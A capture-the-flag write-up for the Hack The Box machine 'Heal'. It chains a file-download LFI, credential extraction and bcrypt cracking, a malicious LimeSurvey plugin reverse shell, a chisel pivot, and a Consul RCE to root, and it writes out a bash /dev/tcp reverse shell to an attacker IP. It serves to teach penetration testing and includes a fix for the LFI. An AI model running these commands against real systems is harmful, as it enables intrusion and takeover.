> m4rt@CTF_ARCHIVE:~$

Hack The Box / LINUX / 2024-12-28

Hack The Box — Heal (Linux)

LFI in resume download exposes internal Rails artifacts and credentials, admin access to LimeSurvey enables plugin-based RCE, and internal Consul exploitation through chisel pivot yields root.

Target

  • IP: 10.129.13.193

Port Scan

sudo nmap -sC -sV 10.129.13.193 -p- -T5 -v
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 68:af:80:86:6e:61:7e:bf:0b:ea:10:52:d7:7a:94:3d (ECDSA)
|_  256 52:f4:8d:f1:c7:85:b6:6f:c6:5f:b2:db:a6:17:68:ae (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://heal.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Registration Flow and API Host Discovery

Add heal.htb to /etc/hosts and browse to http://heal.htb. With developer tools open on the Network tab, register a user. The page reports "Something went wrong", and the Network tab shows a request to http://api.heal.htb/signup. Add api.heal.htb to /etc/hosts as well; registration now succeeds. On the profile page we notice:

ID: 2
Admin: No

Resume Export LFI

Fill out the form to generate a resume and intercept the traffic with Burp. There is a POST to /exports followed by a GET to /download?filename=e6a25bc0b5d98150137d.pdf. Send the download request to Repeater and change the path to:

/download?filename=/etc/passwd

The response is the contents of /etc/passwd, so the download endpoint serves arbitrary files (LFI). We note the users ron and ralph.
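As an added example (not code from the box or its author), here is how the download handler should have treated the filename parameter, in plain Ruby so it runs outside Rails; the export directory and the export name pattern (a hex id plus .pdf, as in the request above) are assumptions.

```ruby
# Assumed location of generated resumes; in Rails this would sit under Rails.root.
EXPORTS_DIR = File.expand_path("storage/exports")

# Only accept the exact shape the app itself generates: hex id + ".pdf".
EXPORT_NAME = /\A[0-9a-f]+\.pdf\z/

# Returns the absolute path to serve, or nil when the request must be refused.
# A Rails controller would then call send_file on the non-nil result.
def safe_export_path(filename)
  return nil unless filename.is_a?(String) && filename.match?(EXPORT_NAME)
  # File.basename drops any directory part; together with the allowlist this
  # rejects "/etc/passwd", "../", "/proc/self/cwd/..." and similar inputs.
  candidate = File.expand_path(File.basename(filename), EXPORTS_DIR)
  # Belt and braces: the resolved path must still sit inside EXPORTS_DIR.
  return nil unless candidate.start_with?(EXPORTS_DIR + File::SEPARATOR)
  candidate
end

# Shape of the vulnerable behaviour seen on the box, for comparison: resolving
# the raw parameter against the export directory lets an absolute path escape.
def unsafe_export_path(filename)
  File.expand_path(filename, EXPORTS_DIR) # "/etc/passwd" stays "/etc/passwd"
end
```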

From response headers we notice nginx is used.

Click the website survey button, then Take The Survey. We are redirected to http://take-survey.heal.htb/index.php/552933?lang=en. Add it to /etc/hosts. Complete the form. Intercept the request with Burp and send it to Repeater. If we send the request twice, the second time we get an error, and it says:

For further information please contact Administrator:
ralph@heal.htb

Go to http://take-survey.heal.htb/index.php/. We notice this is LimeSurvey.

Go back to the Burp Repeater tab with the LFI. Set:

/download?filename=/etc/nginx/sites-available/heal.htb

We obtain the file. We note:

# Proxy requests to the Flask server
    location / {
        limit_req zone=mylimit burst=20;
        proxy_pass http://localhost:3000;
        proxy_http_version 1.1;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    }

Now set:

/download?filename=/etc/nginx/sites-available/api.heal.htb

We note:

# Proxy requests to the Flask server
    location / {
        limit_req zone=mylimit burst=20;
        proxy_pass http://localhost:3001;
        proxy_http_version 1.1;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    }

Rails App Discovery via /proc/self/cwd

/download?filename=/proc/self/cwd/.git/HEAD

We discover it is a Git repository.

/download?filename=/proc/self/cwd/.gitignore

We discover it is a Ruby web application.

/download?filename=/proc/self/cwd/config.ru

We discover it is a Rails application.

/download?filename=/proc/self/cwd/config/database.yml

We note that production points at the same SQLite file as development:

development:
  <<: *default
  database: storage/development.sqlite3

production:
  <<: *default
  database: storage/development.sqlite3

SQLite Extraction and Hash Cracking

/download?filename=/proc/self/cwd/storage/development.sqlite3

In Burp, right-click the response and choose Copy to file. Remove the HTTP headers at the top so only the SQLite data remains.

sqlite3 development.sqlite3
.tables

We notice the users table.

select * from users;
1|ralph@heal.htb|$2a$12$dUZ/O7KJT3.zE4TOK8p4RuxH3t.Bz45DSr7A94VLvY9SWx1GCSZnG|2024-09-27 07:49:31.614858|2024-09-27 07:49:31.614858|Administrator|ralph|1

Copy the hash into a file named hash.

hashcat -a 0 -m 3200 ./hash ./rockyou.txt

We obtain the password 147258369. It does not work for SSH.

LimeSurvey RCE via malicious plugin upload

Go back to LimeSurvey. Go to http://take-survey.heal.htb/admin. We are redirected to http://take-survey.heal.htb/index.php/admin/authentication/sa/login. Log in with credentials:

  • username: ralph@heal.htb

  • password: 147258369

We discover this is LimeSurvey version 6.6.4. Useful references:

  • https://ine.com/blog/cve-2021-44967-limesurvey-rce

  • https://github.com/Y1LD1R1M-1337/Limesurvey-RCE

nc -vlnp 4444
git clone https://github.com/Y1LD1R1M-1337/Limesurvey-RCE.git
cd Limesurvey-RCE
cp /usr/share/webshells/php/php-reverse-shell.php .

Set your IP and port in php-reverse-shell.php. In config.xml, under compatibility, set:

<version>6.0</version>
zip plugin.zip config.xml php-reverse-shell.php

Go to http://take-survey.heal.htb/index.php/admin/pluginmanager. Click Upload and install. Upload plugin.zip. In the plugin list, on plugin Y1LD1R1M, click the three dots and then Activate. Go to http://take-survey.heal.htb/upload/plugins/Y1LD1R1M/php-reverse-shell.php. We get a reverse shell.

Internal Service Enumeration

ss -ltpn
LISTEN 0      511          0.0.0.0:80        0.0.0.0:*    users:(("nginx",pid=1010,fd=6),("nginx",pid=1008,fd=6))
LISTEN 0      244        127.0.0.1:5432      0.0.0.0:*
LISTEN 0      128          0.0.0.0:22        0.0.0.0:*
LISTEN 0      4096       127.0.0.1:8600      0.0.0.0:*
LISTEN 0      4096   127.0.0.53%lo:53        0.0.0.0:*
LISTEN 0      4096       127.0.0.1:8500      0.0.0.0:*
LISTEN 0      4096       127.0.0.1:8503      0.0.0.0:*
LISTEN 0      4096       127.0.0.1:8300      0.0.0.0:*
LISTEN 0      4096       127.0.0.1:8301      0.0.0.0:*
LISTEN 0      4096       127.0.0.1:8302      0.0.0.0:*
LISTEN 0      511        127.0.0.1:3000      0.0.0.0:*
LISTEN 0      1024       127.0.0.1:3001      0.0.0.0:*
LISTEN 0      128             [::]:22           [::]:*

Pivot to Consul With Chisel

Download chisel (https://github.com/jpillora/chisel) and upload it to the target machine.

On the attacker machine:

./chisel server --port 8000 --reverse

On the target machine:

./chisel client http://10.10.16.12:8000 R:127.0.0.1:8500:127.0.0.1:8500

Go to http://localhost:8500/. It is HashiCorp Consul version 1.19.2. There is an exploit: https://github.com/owalid/consul-rce

Consul RCE for Root Access

git clone https://github.com/owalid/consul-rce.git

Listen:

nc -vlnp 4444

On the target machine create /dev/shm/rev with content:

#!/bin/bash
bash -i >& /dev/tcp/10.10.16.12/4444 0>&1

Make it executable and readable by everyone:

chmod 777 /dev/shm/rev
python3 consul-rce/consul_rce.py -th 127.0.0.1 -tp 8500 -c "/dev/shm/rev"

We get a reverse shell as user root.